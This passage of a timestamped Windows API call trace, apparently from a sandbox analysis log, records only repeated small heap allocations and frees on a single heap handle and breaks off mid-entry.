Flags=0x8, Size=0x8) returned 0xc75308 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75288 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75288 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752d8 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752d8 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75238 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75238 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0037.964] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0037.964] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75238 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75238 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0037.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0037.965] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75388 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75388 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75288 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75288 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0037.966] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75238 [0037.966] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75238 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752d8 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752d8 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75388 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75388 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75378 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75378 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752d8 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752d8 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75288 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75288 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0037.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0037.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752d8 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752d8 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75238 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75238 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75398 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75398 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753d8 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753d8 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75308 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75308 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753a8 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753a8 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753e8 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753e8 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0037.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0037.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75338 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75338 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75228 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75228 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752f8 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752f8 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753b8 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753b8 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75348 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75348 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75278 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75278 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75248 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75248 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753b8 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753b8 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75288 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75288 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752c8 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75358 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75358 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75208 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75208 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75268 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0037.969] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0037.969] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0037.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0037.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752b8 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752b8 | out: hHeap=0xc50000) returned 1 [0037.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75238 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75238 | out: hHeap=0xc50000) returned 1 [0037.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75398 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75398 | out: hHeap=0xc50000) returned 1 [0037.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753f8 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753f8 | out: hHeap=0xc50000) returned 1 [0037.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc752a8 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752a8 | out: hHeap=0xc50000) returned 1 [0037.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75398 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75398 | out: hHeap=0xc50000) returned 1 [0037.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75328 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75328 | out: hHeap=0xc50000) returned 1 [0037.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75298 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0037.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75258 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75258 | out: hHeap=0xc50000) returned 1 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc84380 | out: hHeap=0xc50000) returned 1 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc847a8 | out: hHeap=0xc50000) returned 1 [0037.970] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc84590 | out: 